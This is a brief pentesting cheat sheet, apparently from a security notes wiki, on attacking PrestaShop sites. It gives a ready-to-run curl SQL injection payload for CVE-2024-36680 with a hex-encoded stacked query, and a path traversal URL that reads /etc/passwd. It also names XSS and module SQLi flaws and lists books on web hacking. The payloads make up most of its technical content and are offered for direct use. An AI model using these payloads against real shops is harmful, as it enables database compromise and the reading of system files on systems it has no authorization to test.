Prestashop
Enumeration
Search for CVE - Friends-of-Presta
CVE-2024-36680 - SQLi
curl -v "https://preprod.X/modules/pkfacebook/ajax/facebookConnect.php?id=1";select(0x73656C65637420736C656570283432293B)INTO@a;prepare`b`from@a;execute`b`;--&email=test@test.fr
Path Traversal
Prestashop < 8.2.0
http://localhost/?controller=upload&file=../../../../../etc/passwd
XSS
Prestashop 8.0.4 - Cross-Site Scripting (XSS)
SQLi
PrestaShop’s Customer Photo Gallery, version 2.9.3 and below.
Interesting Books
Interesting BooksThe Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
Last updated